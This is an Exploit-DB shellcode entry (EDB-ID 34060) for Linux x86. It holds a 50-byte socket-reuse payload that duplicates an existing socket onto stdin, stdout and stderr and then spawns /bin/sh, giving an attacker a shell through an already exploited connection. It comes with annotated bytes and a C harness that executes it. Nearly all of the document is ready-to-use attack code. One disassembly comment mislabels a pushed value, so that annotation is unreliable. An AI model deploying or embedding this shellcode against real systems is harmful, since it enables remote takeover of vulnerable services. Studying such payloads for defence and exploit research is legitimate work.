Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)

EDB-ID:

34060

Size:

50 bytes


Platform:

Linux_x86

Published:

2014-07-14

/* Socket Re-use Combo for linux x86 systems by ZadYree -- 50 bytes
 * <zadyree@tuxfamily.org>
 *
 * Made using sockfd trick + dup2(0,0), dup2(0,1), dup2(0,2) +
 * execve /bin/sh
 *
 * Thanks: Charles Stevenson, ipv, 3LRVS research team
 *
 * gcc -o socket_reuse socket_reuse.c -z execstack
 */

char shellcode[]= /* We use sys_dup(2) to get the previous attributed sockfd */
"\x6a\x02"      // push 0x2
"\x5b"          // pop ebx
"\x6a\x29"      // push 0x29
"\x58"          // pop eax
"\xcd\x80"      // int 0x80 -> call dup(2)
"\x48"          // dec eax
/* Now EAX = our Socket File Descriptor */

"\x89\xc6"      // mov esi, eax

/* dup2(fd,0); dup2(fd,1); dup2(fd,2); */
"\x31\xc9"                  // xor    %ecx,%ecx
"\x56"                      // push   %esi
"\x5b"                      // pop    %ebx
// loop:
"\x6a\x3f"                  // push   $0x3f
"\x58"                      // pop    %eax
"\xcd\x80"                  // int    $0x80
"\x41"                      // inc    %ecx
"\x80\xf9\x03"              // cmp    $0x3,%cl
"\x75\xf5"                  // jne    80483e8 <loop>

/* execve /bin/sh by ipv */
"\x6a\x0b"                  // push byte 0xb
"\x58"                      // pop eax
"\x99"                      // cdq
"\x52"                      // push edx
"\x31\xf6"                  // xor esi, esi - We add those instructions
"\x56"                      // push esi     - to clean up the arg stack
"\x68\x2f\x2f\x73\x68"      // push dword 0x68732f2f
"\x68\x2f\x62\x69\x6e"      // push dword 0x6e69922f
"\x89\xe3"                  // mov ebx, esp
"\x31\xc9"                  // xor ecx, ecx
"\xcd\x80";                 // int 0x80
;

/* 

shellcode[]=
"\x6a\x02\x5b\x6a\x29\x58\xcd\x80\x48\x89\xc6"
"\x31\xc9\x56\x5b\x6a\x3f\x58\xcd\x80\x41\x80"
"\xf9\x03\x75\xf5\x6a\x0b\x58\x99\x52\x31\xf6"
"\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
"\x89\xe3\x31\xc9\xcd\x80";

*/


int main(void)
{
  printf("Shellcode length: %d\n", strlen(shellcode));
  (*(void(*)()) shellcode)();  
  return 0;
}